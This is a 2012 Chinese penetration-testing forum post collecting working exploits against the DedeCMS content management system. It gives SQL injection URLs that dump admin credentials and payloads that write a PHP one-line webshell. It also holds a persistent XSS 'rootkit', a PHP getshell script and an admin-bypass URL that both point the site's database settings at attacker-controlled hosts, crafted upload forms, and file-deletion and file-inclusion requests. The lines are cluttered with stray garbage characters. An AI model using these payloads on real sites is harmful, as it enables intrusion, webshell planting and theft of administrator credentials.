中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]
作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结

6 ~* n3 r2 a4 ?" W5 tDedecms 5.6 rss注入漏洞1 I: }, [% W3 k; V6 A9 }* O
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1$ n2 t5 ^  n+ z7 G) b7 h: D
" X8 D5 q# t+ a% V

6 H) U  W4 U4 K9 r
! m$ j$ [( e6 H# I  b; t0 T" ^) A# o' U( D! {

7 }) v6 _% ?& K7 K$ E% e9 T/ }9 L6 H, a  J( v

: ~* ~* ~5 K6 M" W7 C1 d  m( U3 [9 c$ v2 I
DedeCms v5.6 嵌入恶意代码执行漏洞
+ _) P* L) D/ f注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
1 d9 z; ^+ P' J; ~9 Z& n! Z! e发表后查看或修改即可执行- w! j: S8 o# r2 a7 A1 ?4 c1 E
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
# O# r0 ?/ X/ b, U. |生成x.php 密码xiao,直接生成一句话。
: ~) B6 s7 J/ m! P$ |! h9 H  a" z8 A& Z$ R& O: M. |
  V- [& N6 B5 y# |; C' s  @

: d$ t# y$ X& g8 i3 ]6 Y
1 s" W- F" G( a) G. W2 Y- x8 u$ H  x1 U1 ~6 G

1 B2 ^9 M& r% ]; z: R$ ]) f% Y( B3 q, d3 p# B
: h* J2 N! A: W5 \5 V" r
Dede 5.6 GBK SQL注入漏洞' ?* @5 i9 _0 f4 B' U9 p
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
5 `7 K& l% Y0 n/ Qhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
3 M) y3 t' J. x- y5 X* I$ dhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
, I9 y$ _/ t  u, i
  E" k* W1 w4 s) Z/ O. M& Q
  C1 R( _2 @8 Q  U
5 y: E- m# }8 W
3 i: z% v; g* d$ w
( J" U( Z1 V* X. |2 q8 g: o  N  }, G8 M1 Z: v
! g' A* {* z  A; |6 r. c
  N- }/ R  ~$ U4 V  S
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
$ F( O5 ?& J1 M" {! ?- i+ v% uhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 9 r5 r2 }9 Q. Q" O6 j/ P' [
% {9 S5 V- W! ~9 c

, _9 f% B7 C. Y7 c' R! ?( i$ o) D) o' d0 U( s
! R4 Z3 w" c" E" @+ h, o

1 B$ I$ ]# ]2 O# t# g9 E) Q; y" b
DEDECMS 全版本 gotopage变量XSS漏洞
9 K' P5 z4 t3 P+ w' Q( h) l* `1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
! L& |. p5 u. q* W& I$ _- yhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="% [& I/ F2 i5 y- Z6 Y' L) i- ^8 B

' p" R7 q& Q7 D  V% ?
: G1 d( y8 Q1 T& k- Y+ n  t! l; |2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 " ?$ Q6 T7 C/ m2 h* q) A, O
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda7 V0 s7 S. U) j) c; l+ y6 |$ F

9 D; j4 A) t3 q3 m, o/ Y, x3 o3 i
2 ]8 [! U, J9 H( P: Bhttp://v57.demo.dedecms.com/dede/login.php
3 J0 ^" A* F$ Y' F/ r0 X  L) W5 t& \% [) M0 d, A

, Y- d" {& l1 e; |8 ~color=Red]DeDeCMS(织梦)变量覆盖getshell
$ j; x! x; S6 j  }1 ^% }. `#!usr/bin/php -w
8 d! Y- r2 d# ^, j2 D<?php& @% a" a9 [  Q- F& _" K
error_reporting(E_ERROR);
. k' |1 H" R5 m4 R3 Kset_time_limit(0);
- Q  a% C' W5 Z2 K0 O5 Bprint_r('
6 j" h! n% P" J( |5 \3 [0 e, cDEDEcms Variable Coverage
  ^0 [) ~/ P: `' C6 b) ^. wExploit Author: www.heixiaozi.comwww.webvul.com
4 l$ w4 F& ]; p2 q, L);
1 J3 A4 g% y; }. @1 \' Xecho "\r\n";* j  f1 [# r5 ~. e
if($argv[2]==null){
: @: z) r  ^+ W9 u* p- i. lprint_r('
: O6 ~# K! L! {+ t+---------------------------------------------------------------------------+' i, N9 }  k' W7 @2 l6 x3 b1 t+ m
Usage: php '.$argv[0].' url aid path( ?$ s+ o8 {# r5 q6 _- {
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
+ ?7 u4 Q9 u7 h3 u4 _Example:
; F; Z: i  [& E4 ~5 M! mphp '.$argv[0].' www.site.com 1 old8 m; f! j+ C# ?7 p. A/ |2 B
+---------------------------------------------------------------------------+6 k  P; W4 |. B4 {8 d
');
/ U( S4 R1 N" Vexit;% a6 q4 m0 u+ I6 b% y& ^
}
( D* o+ r, F0 o" o6 r; h$url=$argv[1];4 [" S8 L  E" ]" O2 b! a* x1 {
$aid=$argv[2];2 J; U6 T" y8 ]. v3 t# D; G
$path=$argv[3];1 o4 |5 g! ?) i% r4 T: S% u" b% I
$exp=Getshell($url,$aid,$path);
7 D1 F: u$ G. o7 w# f0 Z% J' hif (strpos($exp,"OK")>12){) u! ~5 x5 u: _
echo "
( S) D3 l1 P  _% V. nExploit Success \n";+ E2 k! ]! H, A
if($aid==1)echo "3 P% G/ W9 A# W; j( p4 |) W
Shell:".$url."/$path/data/cache/fuck.php\n" ;$ e- w4 e0 z3 Q% G) n  b7 w
, _& }" R  y, L+ M6 @% a9 ^1 K8 |8 y0 r

2 w. H9 c, d: eif($aid==2)echo "
; S; v$ `" }, j9 y+ {' `Shell:".$url."/$path/fuck.php\n" ;
* F/ t! y% W0 G- o' N. [
; T9 F3 A1 d* C9 W, h9 y
0 A; G2 o5 o* C7 Q  R6 gif($aid==3)echo "4 e( F# }5 z2 i* t* q
Shell:".$url."/$path/plus/fuck.php\n";! W- t( s! I6 ?- D1 z0 z

6 S: s/ f- G* F; P5 {
/ E! r& S- c- q( \- s& J4 s2 N}else{$ z4 }! _3 _2 D6 c3 i
echo "3 _7 ^/ u0 \  S" f5 Q( @7 I! s% P
Exploit Failed \n";5 ^/ C$ E8 ~/ E' z3 n
}
' `$ R5 }. _1 }1 S2 hfunction Getshell($url,$aid,$path){' p7 N& h8 G7 `( t7 |- ]9 X7 m
$id=$aid;( Q. P3 W7 @# }$ \: p4 n
$host=$url;3 D- a" _# X; z" D( R) l
$port="80";
% B- G+ ~0 ^; \5 ?: {$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, E# c" M% ]- r$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";; s! W$ i8 R1 E" _) `! ]3 x8 r
$data .= "Host: ".$host."\r\n";: P4 L8 U# v8 w
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
3 r* P$ H4 U3 l  t1 R$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";4 B4 q/ f9 j# e* k5 _
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
, ]$ ^1 `' y1 Y! I//$data .= "Accept-Encoding: gzip,deflate\r\n";' a5 m1 C' O3 W% s
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
* s- g; f: U! ~3 i8 M/ a$data .= "Connection: keep-alive\r\n";6 F% @) m: V- |8 k
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";* ~* L6 ^: V; V8 f; e: t9 b' {! v
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";4 A" m" G; S1 ]% \# }, f
$data .= $content."\r\n";/ H- ?! k2 ^: R  h3 ?8 z
$ock=fsockopen($host,$port);
7 K* Z) W7 ^# P3 n% Wif (!$ock) {
  e; Y6 o9 k7 Y/ A: P7 C9 _8 Q) R* qecho "
4 X  H. E' M; Z9 L( TNo response from ".$host."\n";
; m4 n2 K$ @! K6 X2 P) i. U# |0 a% _}
+ z( F7 j! @6 f2 |: @! o- jfwrite($ock,$data);3 H" J* F6 b2 h. p1 Q4 j9 W
while (!feof($ock)) {
' g! B/ d- R  ~: `  r$exp=fgets($ock, 1024);1 Q5 l! a* u+ U6 k
return $exp;
/ C2 y5 d  P% K; }}1 }# ~+ s1 c" g: b$ S7 u. K2 e
}7 t; _' _. s" D$ y5 p5 S  V6 X1 s2 a  r
7 S) u& w, V) T' T2 Q) B
8 e* l7 e! V( o$ x/ F8 \' E
?>
0 D. {- i( u( z1 z
* V0 |  B, n2 Q" i; `1 N
, A, N: q' T" V# J, H3 P8 ~9 |
: A/ |9 }1 F" R9 ?2 T! K! u
2 U% u: Q/ P8 U/ D6 r* p/ O9 L4 H6 z8 a2 |4 ~" ^6 E% R; [! E; H
6 E  i/ f; X0 `$ k1 @
8 {, B& [% z4 P
$ ?$ D3 j) E1 ^# u3 s# C9 a
1 Z6 X. G! P. j4 U5 C

9 \+ X* g5 d; C6 Z9 eDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)- Z9 ?, C+ O/ K/ I/ I" Z
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root* I/ `' {$ H% R5 `
" |, q" Y4 S" U7 B& I$ l. V1 z& i
+ @  p! u- k  ?+ y- F6 L4 Y8 e
把上面validate=dcug改为当前的验证码,即可直接进入网站后台4 e4 V4 }2 b; H% H; k$ j

3 ?: Q- C+ P# L0 X
/ P; N; \+ g# t$ O# Y8 t! C# D此漏洞的前提是必须得到后台路径才能实现, f' J; E- G, b, u) ^: c

% |* X$ W0 n" j
" t" m) e9 A3 Y2 [/ j" q! ~
5 V3 m& \1 F; g) O. p* n# a/ J, |) U% W
0 L; V6 S1 R9 _8 Q6 j% v
$ k) c( Q# X/ i; ~7 n: s' J
* }# V8 s! o: {
3 z: ]4 a% G2 g- J

( v$ K6 c8 F; F) b/ ]
" d6 w: W) Q. ], Z+ T, M8 T9 W' l+ dDedecms织梦 标签远程文件写入漏洞2 M" Z$ H& R8 K9 D4 j+ E5 t
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');5 n/ U' i! ?, I* R% o4 p

$ Q) x+ Q# |+ I+ f. r4 \
) K+ _% A* O( b( m+ R/ {6 U8 f再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 , m8 U# t$ X6 b9 T7 u) V% ~+ X; m7 k3 i
<form action="" method="post" name="QuickSearch" id="QuickSearch">
: ^, h( A( `$ M! ^<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />% F" a- W/ r# Z+ X
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />6 \+ t/ y# h1 c( {- a2 B
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
5 ~$ I* {% w+ M9 s0 U. R<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
; \& l. G9 B' s<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />" Q6 N& e2 p8 i9 a
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
/ V: ]3 P+ c' `2 `<input type="text" value="true" name="nocache" style="width:400">& R  e( \# }) Q8 x5 f
<input type="submit" value="提交" name="QuickSearchBtn"><br />" q  s* V9 m7 L4 g' Q* m4 w4 o, m
</form>
" T  T/ n, c' a+ j8 X0 h<script>: ^$ @" ~8 R6 R  q9 {
function addaction()
) W) L8 x7 L  n0 f0 o% e{' w5 H& E" U( G( Q( J
document.QuickSearch.action=document.QuickSearch.doaction.value;
2 A: [) s! O9 O5 ~, b: G1 I; H}8 e( z9 C* ]6 Y) @  V  Z9 _+ _* S
</script>
2 d0 S5 [# O$ L" i1 f
2 ~7 p' Y5 h, d+ E& A
0 t8 {- {: q- Y6 h( u/ w- v4 L$ x: [/ S$ V& g6 A0 o

* S+ O; K$ K- S# c
0 @4 T, y3 k- Z! t* Z
3 D' |& v! D" Q* x, o4 \' p' Y9 C& K1 N. f' n/ [' t: G
2 A" I7 y8 o4 O. I& J6 B3 c: x

( K6 ~! k" `2 y1 ~3 l# y# h/ Z3 T% v" }( u
DedeCms v5.6 嵌入恶意代码执行漏洞
" o8 d# P- ?7 g( i; p0 T注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
" M3 r& s4 ^( s! ^1 W" o; c0 ]a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}4 N! h3 C* J5 M) F" x- r
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得& h  w: P+ U8 U4 _% M8 h
Dedecms <= V5.6 Final模板执行漏洞
4 o3 W% O9 G# J/ z4 p* z! M注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:6 `# ~( n& K6 _& L, T
uploads/userup/2/12OMX04-15A.jpg7 L& F3 }9 q" ]$ S, r0 n0 L6 b
! ]3 n  B1 L( }' ]1 H5 g
6 l+ o$ ]6 {' O$ c/ Y5 e* ?
模板内容是(如果限制图片格式,加gif89a):+ `/ a% P. ~* H0 {; x5 o
{dede:name runphp='yes'}7 s6 R- j* X$ @- L9 v
$fp = @fopen("1.php", 'a');
3 C" u) M! y8 p  H* L@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");3 c+ h7 f! c, [
@fclose($fp);
. \  N$ X5 L( U: I5 o9 h; ]{/dede:name}4 C7 `  c+ t8 J9 R9 l1 g. A
2 修改刚刚发表的文章,查看源文件,构造一个表单:
' A7 E9 ~; H: G<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
1 |4 a& ~) ]8 V: f9 p# c4 \<input type="hidden" name="dopost" value="save" />4 b6 t- A, P! ]& _$ |
<input type="hidden" name="aid" value="2" />  J/ t1 [+ M: D9 o& A+ ~, t; s
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
* T* A+ P4 _! ?) @) f" E<input type="hidden" name="channelid" value="1" />5 t7 L/ X  D, U% H6 w) o" h3 B! x
<input type="hidden" name="oldlitpic" value="" />
: H$ y7 U' O; F( x  C<input type="hidden" name="sortrank" value="1275972263" />
+ i5 c5 j6 g6 B
2 {) K, Q' D# A* U8 A% Y! M5 u7 v/ ~( t4 t7 L
<div id="mainCp">/ }2 J0 G1 U0 \- y+ d
<h3 class="meTitle"><strong>修改文章</strong></h3>
& K/ Y1 u% h: U: I4 t  p4 o) z& q' N) z7 k& S8 @
; C% O0 J4 `" a, G2 I4 b3 ~* @5 B
<div class="postForm">
' P7 y$ Q# O7 \  ?" K$ {- [<label>标题:</label>3 y4 L; t, |- a
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>' x0 V& h9 ^2 j: l9 I

8 v9 C2 W5 V+ d. T& O: t! o8 ^# W! Z' r# F/ A  R; W
<label>标签TAG:</label>, K- p: \9 w' |9 ]$ E
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
6 J; |0 B6 ^, n, t) r3 I, {5 J1 |" l! \* z% e# z

% {* D  M! ~) U5 ^<label>作者:</label>
% j. r8 r0 o3 B2 L7 G+ o<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>9 R+ J: r7 Y0 q2 F' B4 S; c: Z+ o1 e

. |2 Z8 ^$ {  @# `6 d6 `3 n2 x- k
: a/ N9 i6 Q7 R, w8 z* X; n( ^6 G<label>隶属栏目:</label>
! {! u2 Y8 \& U<select name='typeid' size='1'>9 i: t$ \; I' o* V/ L
<option value='1' class='option3' selected=''>测试栏目</option>4 m/ w; s9 q# R3 M* R0 Y: ?0 n$ Y
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类); z! I+ Y2 c8 \1 ?
" V; Q  O5 S8 N. h+ H4 a  k

0 V1 @) i2 F4 [& c0 G9 t1 W<label>我的分类:</label>
8 A$ Y3 Y, [  L  V6 b9 n- r; U<select name='mtypesid' size='1'>6 h% k! d: ^$ v' {  V6 ^
<option value='0' selected>请选择分类...</option>: T/ i! s4 a5 U) G
<option value='1' class='option3' selected>hahahha</option>
* q2 R1 S% c$ x0 D) C/ P</select>+ N* J, b, G# e# [+ f: X- N0 h; E

8 S) @; V5 n% G% {" Z* G4 H, A; i# K1 i6 H% J+ ]
<label>信息摘要:</label>. h8 R; Y7 ?5 e# G2 f' l# C
<textarea name="description" id="description">1111111</textarea>
5 u0 O0 w7 |# l% l* S(内容的简要说明)
) j, w+ ^1 j; D: ]; P# Q4 q+ r$ y. h. Y% j2 k: X' r
/ s7 v) k* f( W/ _% P$ T
<label>缩略图:</label>$ h" t& \: p4 r
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
) l+ ?( B3 W5 i* L" d! @
) H8 A( v# S  S5 Y3 K0 C5 x
/ f+ W; N4 c% T% l<input type='text' name='templet') _6 @4 L5 [* @- j1 k! k: T- Y
value="../ uploads/userup/2/12OMX04-15A.jpg">. i' w. l: T9 {1 f8 U: T  o
<input type='text' name='dede_addonfields'
3 l% O* D7 f2 I2 s9 Pvalue="templet,htmltext;">(这里构造)
! M& ^: c4 b1 U3 d</div>( E1 @% f4 ]- E: E

, O# x! L/ y3 N
# H+ g' D. R6 U2 J<!-- 表单操作区域 -->
/ Q7 D4 [3 `* h( l7 H- G, f<h3 class="meTitle">详细内容</h3>2 `4 g# E' m# j( Y
/ V4 Y- s6 |& S0 o3 S9 N2 U$ `7 ~
$ V1 z8 d$ e, ~
<div class="contentShow postForm">
* ^2 a% c1 C% N<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>" L9 }) b, E& q. B* Y* ^( c5 O. C

9 a3 y8 N9 P4 S. K% Z$ Y" h7 X8 G, i9 m9 M$ M4 B
<label>验证码:</label>" C) s/ V: E' t) Q
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />9 a. b0 B" I: g  C9 x' Y( I
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />8 w. H0 N: n5 G3 Y+ k

0 g5 F* D/ H/ g% q) m  r7 L! v+ g, B- Z
<button class="button2" type="submit">提交</button>2 M5 Q9 p' a6 I
<button class="button2 ml10" type="reset">重置</button>9 w' h1 l3 Q' g
</div>
9 f- ~- p6 L! j, y- B
2 V+ _7 p9 x/ e' |& Q1 }
. s6 @9 X9 h# ^  g</div>9 `1 F% ]3 W0 k" I6 l' r' W: U- h' \$ n
4 k5 b$ F! f- Y0 m! G

4 H) x' ?9 {9 B- ]) T</form># s4 J: E9 _0 D
7 u6 x# g5 U# I) l
- |, s# v. I4 ?5 _
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
" _/ o+ D! _/ s0 G假设刚刚修改的文章的aid为2,则我们只需要访问:0 R9 T, Z3 B5 q6 ^
http://127.0.0.1/dede/plus/view.php?aid=2' E; }( a; p+ v7 `+ i7 S
即可以在plus目录下生成webshell:1.php
% R" ?* [* u8 Z; z
$ j5 i5 L& R6 S1 z7 F6 j$ v: J. v+ z. K6 g/ q6 q& ?' ^

/ T6 t# c4 x3 T3 ~" g. w
; A0 L( j* d4 Y0 f5 m! A6 D5 |
( J# g6 F% A; l6 c8 u' x# B% W
& K8 ^9 f) {- J5 s( y& B
( X* J6 X; _) m3 o
+ e. D( k/ k  |: I) h

" Z: V7 H7 ^* S4 X
1 D- s2 _7 ^) A9 G6 c) [# m# M0 m7 x  H2 `4 ]/ G, W
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
' x0 m: Z3 n* `  \% x, u$ i) B& k& GGif89a{dede:field name='toby57' runphp='yes'}" p9 I( ]4 V7 R( L  W
phpinfo();
3 G( {$ h6 d8 p2 C{/dede:field}
8 I: [5 P( r- N. v& P5 f, t( m* N保存为1.gif% x3 Q; y. \5 M: q8 }* ^4 m. v
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ; j) U- j$ G2 b* i& o- d% N2 J
<input type="hidden" name="aid" value="7" /> ; T$ o7 ^" v# i) Z) e$ x
<input type="hidden" name="mediatype" value="1" />
& B: h3 S0 f: y. v: C1 A' L<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
2 i/ H& N- `. L7 v<input type="hidden" name="dopost" value="save" />   s% }* l7 M, v7 w& P8 H
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ' S. L4 t) b8 T' J$ L4 p; f. Z
<input name="addonfile" type="file" id="addonfile"/>
5 W4 s* S  X- ?& _2 ?7 b+ Q<button class="button2" type="submit" >更改</button>
/ I( Z3 A4 }& ^2 Y</form> ( Q0 B0 S  v. B! F

, q+ t, Q; z* i  A6 Y
: O) g' _/ _" x+ J3 P, N构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
% y. N) w1 u; o4 S2 F: P: r发表文章,然后构造修改表单如下:
" r2 S! _$ H( p3 r, i2 p$ M8 `* i
: f5 Q4 A4 `1 J; j. T. G6 }8 a6 d5 }0 N1 ~+ `! \
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> * ^& o5 Q8 j6 l' r' k
<input type="hidden" name="dopost" value="save" />
  }* c9 T: C; `! b" p8 C1 z<input type="hidden" name="aid" value="2" />
1 k" l; d1 }' r( a" r& O5 ^  D<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
, T+ `8 @9 n( f) U1 j6 Y<input type="hidden" name="channelid" value="1" />
, }& g+ o; c+ a8 _<input type="hidden" name="oldlitpic" value="" /> 5 c: g  S6 h; R  p
<input type="hidden" name="sortrank" value="1282049150" /> 6 ?- E. U; @! Q' w9 S. E
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
/ y. N% X! \- [: G" B) k- k<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> & R$ v3 v& P" P" e" e. g
<select name='typeid' size='1'> - |# r% ~2 d; z( @
<option value='1' class='option3' selected=''>Test</option> & ?$ A# p" v/ q2 l+ ~0 @+ E/ k
<select name='mtypesid' size='1'> 6 A) T/ r; W( p5 E8 c& A
<option value='0' selected>请选择分类...</option>
3 _' H; f0 Y* G) ]' }9 ]<option value='1' class='option3' selected>aa</option></select>
* Q' J* ^+ d- v# i+ Q<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
/ o7 t" I- P1 c<input type='hidden' name='dede_addonfields' value="templet">
8 }( C7 ^9 a" _" u9 e<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 7 F0 E' M+ l2 g" X, q  j# k. @
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
5 O" b& F" A, y1 W( p, v<button class="button2" type="submit">提交</button> ' u  e$ ^8 V) g0 S& f$ P
</form>1 H+ l" c1 ~+ ~! u
9 v/ T2 x) y, Q
) b& x0 q9 K( ]- y" V
5 K2 y! k6 t: u9 V
! L2 x. Z3 Y5 n: |  V" T
7 T' M; h# G  [5 g2 c, T5 o. I
" ~' {7 k1 |7 a0 [( {6 c& V3 G

% I+ C% F; l* Z& z, u4 g0 N$ f7 ~5 Z. T3 n1 p3 S" O

* `) q4 a( \- Z5 f3 z2 J- g; I# C& S1 J0 ]

. W4 o+ [8 [9 c- F6 Y; Z2 c! S, d! |; o
织梦(Dedecms)V5.6 远程文件删除漏洞
1 c9 ]+ O( z1 O6 [8 E! p) Yhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif8 ^7 R( `! S+ t! z+ s
9 ^1 P% B$ I& W% W: u$ V

( l6 v# ~# l7 s- s' @% m6 `+ x) O3 h- }4 _* @# v5 D

) J0 S6 Y* O% \/ W9 R9 ~$ M& M: C$ [1 k) ?9 g

- g, @" ?  I2 H& N% J% T; N
+ g2 u0 ^3 w  W- L: }1 l2 }$ u6 W9 I2 b2 z' }
, E. V4 i4 F6 X0 |# q/ X6 D

, c3 O7 \+ @6 |) e1 A) L/ k0 O织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 4 G. T! ?% a. U1 a5 b; a
http://www.test.com/plus/carbuya ... urn&code=../../
! d. n/ y% t% `+ Z7 f2 ~" t! ~. c% v
6 B$ ~) d+ |3 b' n6 m

# v; y( ]1 {$ x/ @* ?1 W. f( o7 b$ L" f; f# c8 E5 |
( G1 G3 q& K9 O5 D  X
/ ]( o$ @% D" z
# S! S& m/ G+ ]7 D- {
. |- k( e5 M. c3 k( L! R4 ^

1 o. D3 @6 |( C5 I5 ~1 ]- C# ]( l2 j/ P. v
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 & t2 }' x( w+ X( w
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
: `& v9 ^) R  p4 i% J6 l- C# A' G密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5: R+ e" n* ^) n- m/ N3 |

; J% f* c4 F- u" e
' d8 x) W7 o8 U/ H" ]
4 {/ S* B# I$ }; F2 @0 N' ~* C# E2 K& g! G* ?- n: C

0 ]6 E2 n) h, F  d! m
0 f- {  d/ z  p! G$ l* M
& X, m! s. l- m) j3 Y8 }- ]( M- G/ `' J7 q" z4 P

5 \  i0 {$ n" F! l. i- y5 N: |/ T$ ^: `7 d4 E
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
% v/ `3 D2 ^8 {0 ^3 S' @http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
) B6 ~5 {5 A) N1 S- e& `/ _! D5 E- Y" g6 H& P

